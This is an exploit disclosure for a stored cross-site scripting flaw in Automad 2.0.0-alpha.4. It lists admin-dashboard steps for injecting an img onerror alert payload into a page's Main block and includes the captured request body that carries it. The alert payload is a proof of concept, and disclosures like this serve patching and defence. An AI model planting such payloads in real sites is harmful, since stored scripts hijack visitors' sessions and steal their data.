# Exploit Title: Automad 2.0.0-alpha.4 - Stored Cross-Site Scripting (XSS)
# Date: 20-06-2024
# Exploit Author: Jerry Thomas (w3bn00b3r)
# Vendor Homepage: https://automad.org
# Software Link: https://github.com/marcantondahmen/automad
# Category: Web Application [Flat File CMS]
# Version: 2.0.0-alpha.4
# Tested on: Docker version 26.1.4, build 5650f9b | Debian GNU/Linux 11
(bullseye)
# Description
A persistent (stored) cross-site scripting (XSS) vulnerability has been
identified in Automad 2.0.0-alpha.4. This vulnerability enables an attacker
to inject malicious JavaScript code into the template body. The injected
code is stored within the flat file CMS and is executed in the browser of
any user visiting the forum. This can result in session hijacking, data
theft, and other malicious activities.
# Proof-of-Concept
*Step-1:* Login as Admin & Navigate to the endpoint
http://localhost/dashboard/home
*Step-2:* There will be a default Welcome page. You will find an option to
edit it.
*Step-3:* Navigate to Content tab or
http://localhost/dashboard/page?url=%2F§ion=text & edit the block named
***`Main`***
*Step-4:* Enter the XSS Payload - <img src=x onerror=alert(1)>
{"data":{"title":"Welcome","+hero":{"blocks":[{"id":"KodzL-KvSZcRyOjlQDYW9Md2rGNtOUph","type":"paragraph","data":{"text":"Testing
for
xss","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"bO_fxLKL1LLlgtKCSV_wp2sJQkXAsda8","type":"paragraph","data":{"text":"<h1>XSS
identified by
Jerry</h1>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"},"+main":{"blocks":[{"id":"lD9sUJki6gn463oRwjcY_ICq5oQPYZVP","type":"paragraph","data":{"text":"You
have successfully installed Automad 2.<br><br><img src=x
onerror=alert(1)><br>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"NR_n3XqFF94kfN0jka5XGbi_-TBEf9ot","type":"buttons","data":{"primaryText":"Visit
Dashboard","primaryLink":"/dashboard","primaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingVertical":"0.5rem","paddingHorizontal":"1.5rem"},"primaryOpenInNewTab":false,"secondaryText":"","secondaryLink":"","secondaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingHorizontal":"1.5rem","paddingVertical":"0.5rem"},"secondaryOpenInNewTab":true,"justify":"start","gap":"1rem"},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"}},"theme_template":"project","dataFetchTime":"1718911139","url":"/"}
------WebKitFormBoundaryzHmXQBdtZsTYQYCv--